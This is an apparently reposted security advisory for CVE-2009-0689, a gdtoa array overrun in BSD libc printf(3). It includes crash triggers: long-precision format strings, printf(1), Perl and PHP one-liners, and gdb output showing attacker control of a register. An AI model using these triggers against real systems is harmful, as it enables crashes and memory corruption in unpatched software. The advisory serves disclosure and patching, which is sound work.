Multiple Vendors libc/gdtoa printf(3) Array Overrun

2009.06.27
Risk: High
Local: Yes
Remote: No
CWE: CWE-119


Ogólna skala CVSS: 6.8/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 8.6/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

[ Multiple Vendors libc/gdtoa printf(3) Array Overrun ] Author: Maksymilian Arciemowicz Date: - - Dis.: 07.05.2009 - - Pub.: 25.06.2009 CVE: CVE-2009-0689 Risk: High Affected Software (12.06.2009): - - OpenBSD 4.5 - - NetBSD 5.0 - - FreeBSD 7.2/6.4 - --- 0.Description --- Week after the release of new version OpenBSD and NetBSD, our research team has checked a new implementation of gdtoa http://openbsd.org/45.html - --- A new version of the gdtoa code has been integrated, bringing better C99 support to printf(3) and friends. - --- More: http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/ - --- 1. Multiple Vendors libc/gdtoa printf(3) Array Overrun --- The main problem exists in new dtoa implementation. asprintf(3) will crash for asprintf(ssij, "%0.262159f",x) where x != 0 the behavior is correct for 262158 Let's see: (gdb) r Starting program: /cxib/C/check Program received signal SIGSEGV, Segmentation fault. 0xbbbb79d9 in __Balloc_D2A () from /usr/lib/libc.so.12 (gdb) bt #0 0xbbbb79d9 in __Balloc_D2A () from /usr/lib/libc.so.12 #1 0xbbbab6d7 in __rv_alloc_D2A () from /usr/lib/libc.so.12 #2 0xbbba8db5 in __dtoa () from /usr/lib/libc.so.12 #3 0xbbba671f in __vfprintf_unlocked () from /usr/lib/libc.so.12 #4 0xbbb882e1 in asprintf () from /usr/lib/libc.so.12 #5 0x08048706 in main () at check.c:6 Let's see src/lib/libc/gdtoa/gdtoaimp.h - ---gdtoaimp.h--- ... #define Kmax 15 ... - ---gdtoaimp.h--- The maximum Kmax length is 15. If we give bigger value, like 17 (edi), program will overrun freelist array. bss will have 0x1. Correct reason (by NetBSD): - ---gdtoaimp.h--- ... #define Kmax (sizeof(size_t) << 3) ... - ---gdtoaimp.h--- What is wrong? This program will crash in - --- src/lib/libc/gdtoa/misc.c --- if ( (rv = freelist[k]) !=0) { freelist[k] = rv->next; } else { x = 1 << k; #ifdef Omit_Private_Memory rv = (Bigint *)MALLOC(sizeof(Bigint) + (x-1)*sizeof(ULong)); #else len = (sizeof(Bigint) + (x-1)*sizeof(ULong) + sizeof(double) - 1) /sizeof(double); if ((double *)(pmem_next - private_mem + len) <= (double *)PRIVATE_mem) { rv = (Bigint*)(void *)pmem_next; pmem_next += len; } else rv = (Bigint*)MALLOC(len*sizeof(double)); #endif if (rv == NULL) return NULL; rv->k = k; rv->maxwds = x; } - --- src/lib/libc/gdtoa/misc.c --- here rv->k = k; or freelist[k] = rv->next; A good example to show this issue is printf(1) program. 127# printf %1.262159f 1.1 Memory fault (core dumped) 127# printf %11.2109999999f 210919999199919999199991791199.5000000000000000000000000000000001000000000001001 esi = 0x12 edi = 0x1d 127# printf %11.2009999999f 220919999199919999199991791199.5000000000000000000000000000000001000000000001001 esi = 0x13 edi = 0x1d we can manipulate esi reg. 127# printf %11.2009999999f 126768668100000000000000000000.100000000000000000000000000000000000000000000000111111111 Program received signal SIGSEGV, Segmentation fault. __Balloc_D2A (k=29) at /usr/src/lib/libc/gdtoa/misc.c:59 59 freelist[k] = rv->next; (gdb) i r eax 0x20efdb04 552590084 ecx 0x77ce2a9d 2010000029 edx 0x0 0 ebx 0x20eff654 552597076 esp 0xcfbfc2b0 0xcfbfc2b0 ebp 0xcfbfc2c8 0xcfbfc2c8 esi 0x41414141 1094795585 edi 0x1d 29 eip 0xf59317 0xf59317 eflags 0x10206 66054 cs 0x2b 43 ss 0x33 51 ds 0x33 51 es 0x33 51 fs 0x33 51 gs 0x33 51 esi = 0x41414141 edi = 0x1d 1267686681 is value of esi reg. program will crash in freelist[k] = rv->next; Example 0: - --- chujwamwmuzg.pl --- #!/usr/local/bin/perl printf "%0.4194310f", 0x0.0x41414141; - --- chujwamwmuzg.pl --- Perl will crash with esi = 0x41414141 edi = 0x15 Example 1: 127# php -r 'money_format("%0.262159n", 1.1111);' Memory fault (core dumped) Programs that allow you to enter/control format string, are vulnerable. We believe that the OpenBSD source-tree have only printf(1) and perl(1) affected. Functions like printf(3), strfmon(3), fprintf(3), sprintf(3), snprintf(3), asprintf(3), vprintf(3), vfprintf(3), vsprintf(3), vsnprintf(3), vasprintf(3) and others, are vulnerable (with new gdtoa impl.) Other languages are also affected ( printf in perl ) - --- 2. Fix --- NetBSD fix: http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h OpenBSD fix: http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c - --- 3. Contact --- Author: Maksymilian Arciemowicz

Referencje:

http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c
http://googlechromereleases.blogspot.com/2009/09/stable-channel-update_30.html
https://bugzilla.mozilla.org/show_bug.cgi?id=516862
https://bugzilla.mozilla.org/show_bug.cgi?id=516396
http://www.ubuntu.com/usn/USN-915-1
http://www.redhat.com/support/errata/RHSA-2010-0154.html
http://www.redhat.com/support/errata/RHSA-2010-0153.html
http://www.redhat.com/support/errata/RHSA-2009-1601.html
http://www.opera.com/support/kb/view/942/
http://www.mozilla.org/security/announce/2009/mfsa2009-59.html
http://www.mandriva.com/security/advisories?name=MDVSA-2009:330
http://www.mandriva.com/security/advisories?name=MDVSA-2009:294
http://support.apple.com/kb/HT4225
http://support.apple.com/kb/HT4077
http://sunsolve.sun.com/search/document.do?assetkey=1-26-272909-1
http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:9541
http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:6528
http://lists.opensuse.org/opensuse-security-announce/2010-06/msg00001.html
http://lists.opensuse.org/opensuse-security-announce/2009-11/msg00004.html
http://lists.apple.com/archives/security-announce/2010/Jun/msg00003.html
http://lists.apple.com/archives/security-announce/2010//Mar/msg00001.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top